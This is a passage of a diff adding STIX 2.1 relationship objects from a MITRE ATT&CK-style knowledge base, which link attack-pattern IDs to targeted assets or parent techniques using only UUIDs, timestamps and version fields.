"external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4afcd585-3a46-471a-bcfa-5000f8447ecf", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b060a1c-932f-4864-a5a4-83f324b62338", + "created": "2021-05-11T18:51:16.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", + "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b182ee1-1ce4-4201-95fa-ce65fca632b5", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b23ce54-a782-4af5-99bd-8bc59c2893b2", + "created": "2020-10-01T02:14:18.100Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b24ca9a-d6c6-4a6f-873e-23f0844fcc70", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b2d1924-93cb-408c-8944-87d4eb9ffd4b", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b30bab5-30ae-4698-a7f4-4736a24956b3", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b3d47fc-8824-4daf-88d6-cea52b9c4e4d", + "created": "2024-06-26T14:49:32.125Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:49:32.125Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b4ca030-cd1b-43fd-a537-a05a190fc295", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b52d3b0-abd1-4dcd-b40b-c831d74cb93c", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b59f255-0e3b-4381-b432-1a77f6811dde", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b6a964f-af5c-4ec2-a309-c1ae6b929596", + "created": "2023-09-28T21:24:51.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:24:51.818Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b853b7c-bc55-4599-b88d-d08d651526c0", + "created": "2023-09-29T18:49:25.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:25.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4b9787b1-8af2-45b0-bb8f-9478e2639345", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4bb159b9-5871-4a0a-9a58-6753b93c6fde", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4bb1b5fb-fe1a-4848-928f-f285b48c6ed0", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4bbb20fe-0a5c-4e61-a7ef-292fb9b6ab46", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4bc38963-c15b-4613-98eb-026db407de78", + "created": "2024-06-26T13:40:42.351Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:40:42.351Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4bfeb1cc-24db-4627-8ca5-1cf56f6bc070", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c0abcca-625a-458a-a918-d3af5726e83d", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c1c9ac8-e8b4-451c-991f-faf7e03d2e08", + "created": "2020-01-24T14:08:23.368Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", + "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c1df272-9c2a-4647-8d05-3c0de1613e12", + "created": "2023-09-28T19:59:23.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:59:23.856Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c1dffb0-e601-43b8-b3cd-c0e815180ffd", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c301067-5589-4d96-adad-8c308b8a0846", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c354f9e-6108-47f9-b58e-7bcaccb2b944", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c42863f-8f57-4948-afe3-922a30f193fa", + "created": "2020-10-01T00:54:30.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c470ce3-cdf6-4909-a27f-7fc0427572ce", + "created": "2024-06-27T09:45:37.865Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:45:37.865Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c53b294-973f-4cc2-a781-6c86b8f1c962", + "created": "2023-09-28T21:23:14.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:23:14.975Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c654016-2678-4b90-a850-8590b100755f", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4c998857-39b2-4c8c-a11c-089c469f7b33", + "created": "2020-02-11T18:48:48.762Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", + "target_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4caab538-217d-4395-b241-34765482c338", + "created": "2020-01-24T17:16:12.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4cafa0d5-81e0-4c05-a640-053f0903ffb5", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4cb38ed3-f8b3-4db6-ab93-1c1cf5a862b4", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4cbb3304-f5e7-4ed7-a49a-aefad5b05f62", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ccc54d0-7e7e-44ce-8e3b-505c89578dc0", + "created": "2024-06-26T13:45:03.058Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:45:03.058Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4cf40623-278a-437c-b3b5-3a5521b9e53f", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4cfd348f-d2b0-4e89-b485-b2d02f912d1d", + "created": "2020-01-23T22:02:48.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4d0f7c6a-c9c1-4d69-9314-0fdafdf8da3b", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 